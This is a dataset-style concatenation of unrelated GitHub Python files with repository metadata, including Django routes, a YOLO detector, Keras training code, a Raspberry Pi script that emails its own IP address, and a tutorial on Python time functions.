cdf053a52f25af7b85523a36dc43a01d2e912c6c | 6d56602872bf0e307538e1db72a43c00f039b450 | /tests/test_daemon_context.py | 0615d666859e777d51e1a4e5b0b677f7bc9e2295 | [
"ISC"
] | permissive | josephturnerjr/boatshoes | 6b566276411ed74302f932dff34620e6e7a95087 | 7f5c871ea796080551440464cb09fcb1c21c400e | refs/heads/master | 2021-01-23T14:04:57.835548 | 2012-02-14T16:38:15 | 2012-02-14T16:38:15 | 2,929,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | import unittest
import sys
import os.path
sys.path.append(os.path.join(os.path.split(__file__)[0], '..'))
from boatshoes.DaemonContext import DaemonContext
class TestDaemonContext(unittest.TestCase):
def setUp(self):
pass
def test_daemonize(self):
try:
with DaemonContext(True) as dc:
# only the child makes it in
print dc # won't be printed
except SystemExit, e:
self.assertTrue(e.code == 0)
def test_return_code(self):
try:
with DaemonContext(True) as dc:
# only the child makes it in
print "yep" # won't be printed
dc.return_value = -1
except SystemExit, e:
self.assertTrue(e.code == -1)
def test_noop(self):
# Shouldn't throw
with DaemonContext(False) as dc:
# If you pass in False, DaemonContext is a no-op
# print "yep" # this one would be printed
dc.return_value = -1
if __name__ == "__main__":
unittest.main()
| [
"turner@miserware.com"
] | turner@miserware.com |
e0c83232aa5f928d75db9d99f970900550b2941c | f228254008e82d0136821eab3cf535b02e738d9d | /myapp/urls.py | 2680d357ae564980a96525fa7f57db96c83beeff | [] | no_license | pradhyumvyas/Django-Starting | 68a46a225debbd32e165422c0a9092d02f71603d | 6e8e9b6f02fc553a94d29e62bd6f319ff35396ea | refs/heads/master | 2022-12-03T10:21:27.701497 | 2020-07-24T20:37:31 | 2020-07-24T20:37:31 | 265,812,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | py | from django.contrib import admin
from django.urls import path
from myapp import views
urlpatterns = [
path('', views.index, name='home'),
path('about', views.about, name='about'),
path('services', views.service, name='service'),
path('contact', views.contact, name='contact'),
]
| [
"pradhyumvyas92@gmail.com"
] | pradhyumvyas92@gmail.com |
81584208ba19bae03d4f4f7d1847c0b03c0bb2b3 | 62402e4833b7e713a488e533f1ccfc22862d43d5 | /yolo_model/detect.py | 2a21e72ec266dabb103680a8ff0af2f37e8e550a | [] | no_license | Rip-Hunter/hackathon_traffic_light | bf8185e8e1aed39e756c73cb66fac15a4f4ad0a0 | b9dd5e6cc6761e0ef688ac501616900bf4464305 | refs/heads/master | 2022-12-25T06:15:54.522294 | 2020-10-03T18:30:26 | 2020-10-03T18:30:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,614 | py | import argparse
from .models import * # set ONNX_EXPORT in models.py
from .utils.datasets import *
from .utils.utils import *
from typing import List
# x0y0 - left down
# x1y1 - up right
class BBox:
def __init__(self, x0, y0, x1, y1, class_index, confidence: float):
self.x0 = x0
self.y0 = y0
self.x1 = x1
self.y1 = y1
self.class_index = class_index
self.confidence = confidence
def create_model(cfg, weights, imgsz, half=False, device="cpu") -> (Darknet, str):
# increase speed? idk
torch.backends.cudnn.benchmark = True
# Initialize
device = torch_utils.select_device(device)
# Initialize model
model = Darknet(cfg, imgsz)
# Load weights
model.load_state_dict(torch.load(weights, map_location=device)['model'])
# Eval mode
model.to(device).eval()
# Fuse Conv2d + BatchNorm2d layers
# model.fuse()
# Half precision
half = half and device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Run inference
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
_ = model(img.half() if half else img.float()) if device.type != 'cpu' else None # run once
return model, device
def detect(model, img0, img_size, half=False, device="cpu", conf_thres=0.3, iou_thres=0.6, augment=False) -> np.ndarray:
"""
:return: array of rows where the elements are x0, y0, x1, y1, confidence, class
"""
# convert frame to network friendly format
# Padded resize
img = letterbox(img0, new_shape=img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
img = torch.from_numpy(img).to(device)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
if img.ndimension() == 3:
img = img.unsqueeze(0)
# Inference
t1 = torch_utils.time_synchronized()
pred = model(img, augment=augment)[0]
t2 = torch_utils.time_synchronized()
# to float
if half:
pred = pred.float()
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres,
multi_label=False, classes=None, agnostic=False)
boxes = []
# Process detections
for i, det in enumerate(pred): # detections for image i
if det is not None and len(det):
# Rescale boxes from imgsz to im0 size
det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img0.shape).round()
# Write results
for row in det:
# .data[0] to convert tensors to numbers
boxes.append(row.cpu().numpy())
# print(f"inference time: {t2 - t1:.2}s")
return np.stack(boxes, axis=0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--cfg', type=str, default='cfg/yolov3-spp.cfg', help='*.cfg path')
parser.add_argument('--names', type=str, default='data/coco.names', help='*.names path')
parser.add_argument('--weights', type=str, default='weights/yolov3-spp-ultralytics.pt', help='weights path')
parser.add_argument('--source', type=str, default='data/samples', help='source') # input file/folder, 0 for webcam
parser.add_argument('--output', type=str, default='output', help='output folder') # output folder
parser.add_argument('--img-size', type=int, default=512, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.3, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--fourcc', type=str, default='mp4v', help='output video codec (verify ffmpeg support)')
parser.add_argument('--half', action='store_true', help='half precision FP16 inference')
parser.add_argument('--device', default='', help='device id (i.e. 0 or 0,1) or cpu')
parser.add_argument('--view-img', action='store_true', help='display results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--classes', nargs='+', type=int, help='filter by class')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
# opt = parser.parse_args()
# opt.cfg = check_file(opt.cfg) # check file
# opt.names = check_file(opt.names) # check file
# print(opt)
# with torch.no_grad():
# detect()
| [
"ma.ba1@rambler.ru"
] | ma.ba1@rambler.ru |
24b4f0e558b941cbedb6f36f6594b395773a7db1 | 6aec2583b4246eac64e110e733d2d20a4029075b | /src/command_modules/azure-cli-redis/setup.py | 8aa7a328e6c190e05e614e726064a1ab4a295c4f | [
"MIT"
] | permissive | erich-wang/azure-cli | c85953fe63b71b055819d55de9b3136896e346db | ebb72c97491c52b2b5d31c8e5ad9f79f412c136b | refs/heads/master | 2020-12-11T07:53:55.999508 | 2017-01-23T23:57:59 | 2017-01-23T23:57:59 | 64,140,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,791 | py | #!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from codecs import open
from setuptools import setup
VERSION = '0.1.1b1+dev'
# The full list of classifiers is available at
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: MIT License',
]
DEPENDENCIES = [
'azure-mgmt-redis==1.0.0',
'azure-cli-core',
]
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azure-cli-redis',
version=VERSION,
description='Microsoft Azure Command-Line Tools Redis Command Module',
long_description=README + '\n\n' + HISTORY,
license='MIT',
author='Microsoft Corporation',
author_email='azpycli@microsoft.com',
url='https://github.com/Azure/azure-cli',
classifiers=CLASSIFIERS,
namespace_packages=[
'azure',
'azure.cli',
'azure.cli.command_modules',
],
packages=[
'azure.cli.command_modules.redis',
],
install_requires=DEPENDENCIES,
)
| [
"noreply@github.com"
] | erich-wang.noreply@github.com |
d6eab2c021daa012233182dd8b6ba5e039bf5040 | 979ab48d26a168ec7614e27583c91cd86915dbd6 | /train.py | a19d3ec01897a69a1f6ba878fa9adf3bd6ebf34d | [] | no_license | abhran/Face-Expression-recognition | 6d6a7ac29fda1aaa72cfaea171b0ffdb5eff6f48 | f0e697f66c8d280cfd0265f74ffe53a5c147ebc3 | refs/heads/main | 2023-08-30T21:14:14.111113 | 2021-10-17T12:02:48 | 2021-10-17T12:02:48 | 311,151,567 | 5 | 1 | null | 2020-11-28T19:36:03 | 2020-11-08T20:46:44 | Python | UTF-8 | Python | false | false | 7,358 | py | import os
import tqdm
from PIL import Image
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from ast import literal_eval
import tensorflow as tf
from keras.activations import relu
# import keras
import keras
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D,MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.callbacks import CSVLogger
from keras.optimizers import Adam
from keras.models import load_model
# no=100
# model=load_model(f"saved_model/senti_save_model{no}.h5")
# K.tensorflow_backend.set_session(sess)
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True # dynamically grow the memory used on the GPU
# config.log_device_placement = True # to log device placement (on which device the operation ran)
# sess = tf.Session(config=config)
# set_session(sess) # set this TensorFlow session as the default session for Keras
tf.compat.v1.keras.backend.set_session(tf.compat.v1.Session(config=config))
# def train(x):
def train(x):
# first input model
# visible = Input(shape=input_shape, name='input')
num_classes = 7
#the 1-st block
conv1_1 = Conv2D(64, kernel_size=3, activation='relu', padding='same', name = 'conv1_1')(x)
conv1_1 = BatchNormalization()(conv1_1)
conv1_2 = Conv2D(64, kernel_size=3, activation='relu', padding='same', name = 'conv1_2')(conv1_1)
conv1_2 = BatchNormalization()(conv1_2)
pool1_1 = MaxPooling2D(pool_size=(2,2), name = 'pool1_1')(conv1_2)
drop1_1 = Dropout(0.3, name = 'drop1_1')(pool1_1)
#the 2-nd block
conv2_1 = Conv2D(128, kernel_size=3, activation='relu', padding='same', name = 'conv2_1')(drop1_1)
conv2_1 = BatchNormalization()(conv2_1)
conv2_2 = Conv2D(128, kernel_size=3, activation='relu', padding='same', name = 'conv2_2')(conv2_1)
conv2_2 = BatchNormalization()(conv2_2)
conv2_3 = Conv2D(128, kernel_size=3, activation='relu', padding='same', name = 'conv2_3')(conv2_2)
conv2_2 = BatchNormalization()(conv2_3)
pool2_1 = MaxPooling2D(pool_size=(2,2), name = 'pool2_1')(conv2_3)
drop2_1 = Dropout(0.3, name = 'drop2_1')(pool2_1)
#the 3-rd block
conv3_1 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_1')(drop2_1)
conv3_1 = BatchNormalization()(conv3_1)
conv3_2 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_2')(conv3_1)
conv3_2 = BatchNormalization()(conv3_2)
conv3_3 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_3')(conv3_2)
conv3_3 = BatchNormalization()(conv3_3)
conv3_4 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_4')(conv3_3)
conv3_4 = BatchNormalization()(conv3_4)
pool3_1 = MaxPooling2D(pool_size=(2,2), name = 'pool3_1')(conv3_4)
drop3_1 = Dropout(0.3, name = 'drop3_1')(pool3_1)
#the 4-th block
conv4_1 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_1')(drop3_1)
conv4_1 = BatchNormalization()(conv4_1)
conv4_2 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_2')(conv4_1)
conv4_2 = BatchNormalization()(conv4_2)
conv4_3 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_3')(conv4_2)
conv4_3 = BatchNormalization()(conv4_3)
conv4_4 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_4')(conv4_3)
conv4_4 = BatchNormalization()(conv4_4)
pool4_1 = MaxPooling2D(pool_size=(2,2), name = 'pool4_1')(conv4_4)
drop4_1 = Dropout(0.3, name = 'drop4_1')(pool4_1)
#the 5-th block
conv5_1 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_1')(drop4_1)
conv5_1 = BatchNormalization()(conv5_1)
conv5_2 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_2')(conv5_1)
conv5_2 = BatchNormalization()(conv5_2)
conv5_3 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_3')(conv5_2)
conv5_3 = BatchNormalization()(conv5_3)
conv5_4 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_4')(conv5_3)
conv5_3 = BatchNormalization()(conv5_3)
pool5_1 = MaxPooling2D(pool_size=(2,2), name = 'pool5_1')(conv5_4)
drop5_1 = Dropout(0.3, name = 'drop5_1')(pool5_1)
#Flatten and output
flatten = Flatten(name = 'flatten')(drop5_1)
output = Dense(num_classes, activation='softmax', name = 'output')(flatten)
return output
inp = keras.Input(shape=(48,48,1))
x=train(inp)
model=keras.Model(inp,x)
# lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
# initial_learning_rate=4e-4,
# decay_steps=500000,
# decay_rate=0.9,
# staircase=True)
opt = Adam(lr=0.0005, decay=0.0005 / 10)
# opt = Adam(lr=lr_schedule, decay=1e-6)
# print("[INFO] compiling model...")
# pixel_cnn.compile(optimizer=opt, loss=losses, loss_weights=lossWeights)#, metrics=["accuracy"])
# opt=keras.optimizers.RMSprop(learning_rate=lr_schedule,decay=0.95,momentum=0.9, epsilon=1e-8, name="RMSprop")
loss = tf.keras.losses.categorical_crossentropy
model.compile(optimizer=opt, loss=loss, metrics=['accuracy'])
print(model.summary())
datax=pd.read_csv('filexxx.csv').astype(int)
data=pd.read_csv('Train.csv')
datay=data['emotion'].astype(int)
y=datay.iloc[32000:]
yval = pd.get_dummies(y, prefix='emotion')
x=np.array(datax)
x=x[:,1:]
x_=x.reshape(3887,48,48,1)
yval=np.array(yval)
xval=x_/127.5-1
datay=data['emotion'].astype(int)
hist=pd.DataFrame({'acc':[],"loss":[],"val_acc":[],"val_loss":[]})
for j in range(1,1001):
for i in range (0,8):
hist_={'acc':0,"loss":1,"val_acc":2,"val_loss":3}
print(f"Epoch : {j}/{1000} ",end="" )
print(f"Batch : {(i)*125}/{125*8}")
datax=pd.read_csv(f'file{i}.csv').astype(int)
y=datay.iloc[i*4000:(i+1)*4000]
ytest=y
x=np.array(datax)
x=x[:,1:]
x_=x.reshape(4000,48,48,1)
y = pd.get_dummies(y, prefix='emotion')
y_=np.array(y)
x=x_/127.5-1
# print(x,x.shape)
# csv_logger = CSVLogger(f'loss_log{i}.csv', append=True, separator=',')
history_callback=model.fit(x, y_, batch_size=32, epochs=1,validation_data=(xval, yval), shuffle=True, verbose=1)#,callbacks=[tensorboard_cb,csv_logger],verbose=1)
hist_["acc"] = history_callback.history['accuracy']
hist_["loss"] = history_callback.history["loss"]
hist_["val_acc"] = history_callback.history['val_accuracy']
hist_["val_loss"] = history_callback.history['val_loss']
history=pd.DataFrame(hist_)
hist=pd.concat([hist,history])
print(hist)
if j%10==0:
hist.to_csv(f"val_rerun/history{j}.csv")
model.save(f'saved_model_rerun/senti_saved_model{j}.h5')
| [
"noreply@github.com"
] | abhran.noreply@github.com |
173d992267a4c50b4df509c54add6f9396d75fbc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02821/s313302941.py | 271131d42505bd3b94253e5c4d6e944e2905ed13 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | n, m = map(int, input().split())
a = list(map(int, input().split()))
def cumsum(s):
n = len(s)
cs = [0] * (n+1)
for i in range(n):
cs[i+1] = cs[i] + s[i]
return cs
def bs_list(a, f):
l, r = -1, len(a)
while r - l > 1:
x = (l + r) // 2
if f(a[x]): r = x
else: l = x
return None if r == len(a) else r
a.sort()
ca = cumsum(a)
def detect(x):
num = 0
for b in a[::-1]:
res = bs_list(a, lambda y: y >= x - b)
if res is None: break
num += n - res
return num <= m
l, r = -1, 10**5*2+10
while r - l > 1:
x = (l+r) // 2
if detect(x): r = x
else: l = x
s, c = 0, 0
for b in a[::-1]:
res = bs_list(a, lambda x: x >= r - b)
if res is None: break
c += (n - res)
s += b * (n - res) + (ca[n] - ca[res])
print(s + (m - c) * l)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d7d9d0bb130dfd306c0dce147eb5b45376f0d532 | 304bd3654cb4773613a7eed9ea0c36dab9a45da7 | /uni_code.py | 8d52dedfcd60ff00c0672e1d409e82d67e5afd94 | [] | no_license | Padma-1/unicode | 52fe6a68b1a1fe74a76a1847489815c5d06c2179 | 180b75b63794eda19e061b7fd137d66550ea1061 | refs/heads/master | 2022-12-09T01:52:16.017170 | 2020-09-12T13:08:52 | 2020-09-12T13:08:52 | 294,945,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | unicode = {0:9471,1:10102,2:10103,3:10104,4:10105,5:10106,6:10107,7:10108,8:10109,9:10110,10:10111}
x = (input("Insert digits 0-9:"))#0123456789-->any number u can give
num = " "
for i in x:
i=int(i)
i=chr(unicode[i])
num=num+i
print("the result of unicode =%s"%num)#⓿❶❷❸❹❺❻❼❽❾-->%s is must in code
| [
"noreply@github.com"
] | Padma-1.noreply@github.com |
734019477f6f103006befcfb0b04e7f2c6331473 | ee57bec712f3f75629490e100e1bd244bc152db8 | /demo/migrations/0008_alter_demo_thumbnail.py | e7b5116a7043d161fd2644ecd0921c9fffc3b9db | [
"MIT"
] | permissive | DevKor-Team/devkor_hackathon_back | f7f9a9c14d68ab89a340dcfde7411dde50652a48 | 435fd0552a1efdc7995698bf64b5f7104f3de193 | refs/heads/develop | 2023-07-21T22:26:13.201391 | 2021-08-22T04:05:46 | 2021-08-22T04:05:46 | 364,278,326 | 0 | 0 | MIT | 2021-08-22T03:55:57 | 2021-05-04T14:11:54 | Python | UTF-8 | Python | false | false | 405 | py | # Generated by Django 3.2.1 on 2021-08-21 16:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("demo", "0007_demo_show"),
]
operations = [
migrations.AlterField(
model_name="demo",
name="thumbnail",
field=models.ImageField(blank=True, null=True, upload_to="images/"),
),
]
| [
"cndghks15@gmail.com"
] | cndghks15@gmail.com |
47a55a1244fdbd065fac85c3af66d6f86bba490e | 7bfe45e34619e4c90ac621700a8d140634220b46 | /linux自动发送IP.py | 8f7da0f3cca4e2a72d7e83909efe845f6ba833c6 | [] | no_license | maxuehao/Python-script | f03479269581f2ec911e69cc1473e62f6f6eb23d | 8448a51908d1c3e8b10a449cd5bf6fdd55a23f66 | refs/heads/master | 2020-05-23T18:02:53.890209 | 2017-05-15T00:09:18 | 2017-05-15T00:09:18 | 84,777,121 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | # -*- coding: utf-8 -*-
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import socket
import os
#检测是否联网
while True:
return1=os.system('ping -c 2 www.baidu.com')
if return1 == 0:
print ('ok')
break
else:
print ('no')
#获取本地ip
def Get_local_ip():
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
if __name__ == "__main__":
ip = Get_local_ip()
#将本机ip地址通过邮件发送给主机邮箱
sender = '15624985416@sina.cn'
receiver = 'maxuehao123@outlook.com'
subject = 'From Raspberry Pi '
smtpserver = 'smtp.sina.cn'
username = '*****'
password = '*****'
message = MIMEText(ip, 'plain', 'utf-8')
message['Subject'] = Header(subject, 'utf-8')
smtp = smtplib.SMTP()
smtp.connect('smtp.sina.cn')
smtp.login(username, password)
smtp.sendmail(sender, receiver, message.as_string())
smtp.quit()
| [
"maxuehao123@outlook.com"
] | maxuehao123@outlook.com |
ca927e74c401ed7237e800785a6fa3559d18ef8b | 9f7aad21936e59161573f29cc9bcfd0136c341ad | /alien_invasion.py | f65eccd8582545724593fc55f21614a4ed231238 | [] | no_license | pedrohbferreira/alien_invasion_livro | f9cff8448605e8ab2db34a01c7ef227370f7f23b | 590467922c939dd79e1aaf95508dbc00e5be2f9d | refs/heads/master | 2020-03-30T04:54:29.869667 | 2019-02-26T15:30:09 | 2019-02-26T15:30:09 | 150,768,367 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,013 | py | # -*- coding: utf-8 -*-
import sys
import pygame
from pygame.sprite import Group
from pygame import Surface
import game_funcions as gf
from settings import Settings
from ship import Ship
from game_stats import GameStats
from button import Button
from scoreboard import Scoreboard
def run_game():
# Inicia o jogo e cria um objeto para a tela
pygame.init()
ai_settings = Settings()
ai_settings.set_icon("alien_icon_32x32.bmp")
# cria uma tela com as dimensões de ai_settings
screen = pygame.display.set_mode(
(ai_settings.screen_width, ai_settings.screen_height)
) # type: Surface
pygame.display.set_caption("Alien Invasion")
# cria o grupo de projéteis, todos disparados ficaram aqui
bullets_group = Group()
aliens_group = Group()
# cria a espaçonave
ship = Ship(ai_settings, screen)
# cria a frota de aliens
gf.create_fleet(ai_settings, screen, ship.rect.height, aliens_group)
# cria a instancia para estatísticas
stats = GameStats(ai_settings)
score_board = Scoreboard(ai_settings, screen, stats)
# cria a instancia do botão play
btn_play = Button(screen, "Play")
# Inicia o laço principal do jogo
# neste onde ocorre todos os eventos
while True:
# escuta de eventos de mouse ou teclado
gf.check_events(ai_settings, screen, stats, score_board, btn_play, ship, aliens_group, bullets_group)
if stats.game_active:
# atualiza a posição da nave
ship.update()
# atualiza e limpa os projéteis
gf.update_bullets(ai_settings, screen, stats, score_board, ship.rect.height, bullets_group, aliens_group)
# atualiza a posição dos aliens
gf.update_aliens(ai_settings, stats, score_board, screen, ship, aliens_group, bullets_group)
# atualiza as informações da tela
gf.update_screen(ai_settings, screen, stats, score_board, ship, aliens_group, bullets_group, btn_play)
run_game()
| [
"pedrobarreto.ti@outlook.com"
] | pedrobarreto.ti@outlook.com |
48029ad550be99084bdc75771e75b28299f992dd | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/basic/28_1.py | 8bba51f3b7f6bc07e66c3cce6c8bb5320e828687 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,733 | py | Time Functions in Python | Set 1 (time(), ctime(), sleep()…)
Python has defined a module, “time” which allows us to handle various
operations regarding time, its conversions and representations, which find its
use in various applications in life. The beginning of time is started
measuring from **1 January, 12:00 am, 1970** and this very time is termed as “
**epoch** ” in Python.
**Operations on Time :**
**1\. time()** :- This function is used to count the number of **seconds
elapsed since the epoch**.
**2\. gmtime(sec)** :- This function returns a **structure with 9 values**
each representing a time attribute in sequence. It converts **seconds into
time attributes(days, years, months etc.)** till specified seconds from epoch.
If no seconds are mentioned, time is calculated till present. The structure
attribute table is given below.
Index Attributes Values
0 tm_year 2008
1 tm_mon 1 to 12
2 tm_mday 1 to 31
3 tm_hour 0 to 23
4 tm_min 0 to 59
5 tm_sec 0 to 61 (60 or 61 are leap-seconds)
6 tm_wday 0 to 6
7 tm_yday 1 to 366
8 tm_isdst -1, 0, 1 where -1 means
Library determines DST
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# time() and gmtime()
# importing "time" module for time operations
import time
# using time() to display time since epoch
print ("Seconds elapsed since the epoch are : ",end="")
print (time.time())
# using gmtime() to return the time attribute structure
print ("Time calculated acc. to given seconds is : ")
print (time.gmtime())
---
__
__
Output:
Seconds elapsed since the epoch are : 1470121951.9536893
Time calculated acc. to given seconds is :
time.struct_time(tm_year=2016, tm_mon=8, tm_mday=2,
tm_hour=7, tm_min=12, tm_sec=31, tm_wday=1,
tm_yday=215, tm_isdst=0)
**3\. asctime(“time”)** :- This function takes a time attributed string
produced by gmtime() and returns a **24 character string denoting time**.
**4\. ctime(sec)** :- This function returns a **24 character time string** but
takes seconds as argument and **computes time till mentioned seconds**. If no
argument is passed, time is calculated till present.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# asctime() and ctime()
# importing "time" module for time operations
import time
# initializing time using gmtime()
ti = time.gmtime()
# using asctime() to display time acc. to time mentioned
print ("Time calculated using asctime() is : ",end="")
print (time.asctime(ti))
# using ctime() to diplay time string using seconds
print ("Time calculated using ctime() is : ", end="")
print (time.ctime())
---
__
__
Output:
Time calculated using asctime() is : Tue Aug 2 07:47:02 2016
Time calculated using ctime() is : Tue Aug 2 07:47:02 2016
**5\. sleep(sec)** :- This method is used to **hault the program execution**
for the time specified in the arguments.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# sleep()
# importing "time" module for time operations
import time
# using ctime() to show present time
print ("Start Execution : ",end="")
print (time.ctime())
# using sleep() to hault execution
time.sleep(4)
# using ctime() to show present time
print ("Stop Execution : ",end="")
print (time.ctime())
---
__
__
Output:
Start Execution : Tue Aug 2 07:59:03 2016
Stop Execution : Tue Aug 2 07:59:07 2016
This article is contributed by **Manjeet Singh**. If you like GeeksforGeeks
and would like to contribute, you can also write an article using
contribute.geeksforgeeks.org or mail your article to
contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks
main page and help other Geeks.
Please write comments if you find anything incorrect, or you want to share
more information about the topic discussed above.
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"qmnguyenw@gmail.com"
] | qmnguyenw@gmail.com |
18e68b2aa1b9e85929478d50bbd118e19024a819 | b962e46ca567cdc653ddf4083a67a8a71bdb8c54 | /fw/torch_model/MLPWrapper.py | 4e77794d9a6b4127fe0d0e347080ba768143b247 | [] | no_license | MannyKayy/pytorch-chainer-combination | 6ff5d56c1123bb2e37fb6336a90ca5160a16a541 | 7d87cf0f13a82f572ac5a29d0aa6adbefd2f1a83 | refs/heads/master | 2022-09-24T13:53:20.914614 | 2020-06-07T23:31:08 | 2020-06-07T23:31:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | from fw.torch_model.MLP import MLP
class MLPWrapper(MLP):
def forward(self, *args, **kwargs):
return super(MLPWrapper, self).forward(args[0])
def namedlinks(self, skipself=False):
# Hack for the evaluator extension to work
return []
| [
"43694878+take0212@users.noreply.github.com"
] | 43694878+take0212@users.noreply.github.com |
ab4d28686d9667d4d1599726cc48f421005ecf3c | e0fc3c4c95322d9f8e5cd486e7414f392768be9f | /deneme_tkinter.py | 1f3edc0911a82da6102e9bc14e6a72a9d12d8ef7 | [] | no_license | harunresit/project_2_d_scanner | d7cb18dca22cd3eb6caf618bf758b941b36f6777 | 17a23b8bdea4470a52b21f700473e8fbb46c0265 | refs/heads/master | 2022-04-08T17:20:04.618368 | 2020-03-10T06:22:10 | 2020-03-10T06:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,606 | py | #import tkinter as tk
#
#frame = tk.Tk() #tkinter modülünden Tk sınıfı ile bir nesne oluşturduk
#frame.geometry('500x500') #geometry method'dur
#
#print(dir(frame))
#frame.mainloop()
#frame.destroy()
#import tkinter as tk
#
#pencere = tk.Tk()
#
#def çıkış():
# etiket['text'] = 'Elveda zalim dünya...'
# düğme['text'] = 'Bekleyin...'
# düğme['state'] = 'disabled'
# pencere.after(2000, pencere.destroy)
#
#etiket = tk.Label(text='Merhaba Zalim Dünya')
#etiket.pack()
#
#düğme = tk.Button(text='Çık', command=çıkış)
#düğme.pack()
#
#pencere.protocol('WM_DELETE_WINDOW', çıkış)
#
#pencere.mainloop()
import tkinter as tk
class Pencere(tk.Tk): #Tk sınıfını miras aldık
def __init__(self):
#super().__init__()
tk.Tk.__init__(self) #eğer birden fazla sınıf miras alınmıyorsa super init iş görür. ancak birden fazla sınıf miras alınmışsa istediğimiz öncelik sırasında göre sınıfları init edebiliriz, aksi takdirde super __init__ parantezdeki sıraya göre init edecektir
self.protocol('WM_DELETE_WINDOW', self.çıkış)
self.etiket = tk.Label(text='Merhaba Zalim Dünya')
self.etiket.pack()
self.düğme = tk.Button(text='Çık', command=self.çıkış)
self.düğme.pack()
def çıkış(self):
self.etiket['text'] = 'Elveda zalim dünya...'
self.düğme['text'] = 'Bekleyin...'
self.düğme['state'] = 'disabled'
self.after(2000, self.destroy)
pencere = Pencere()
pencere.mainloop() | [
"noreply@github.com"
] | harunresit.noreply@github.com |
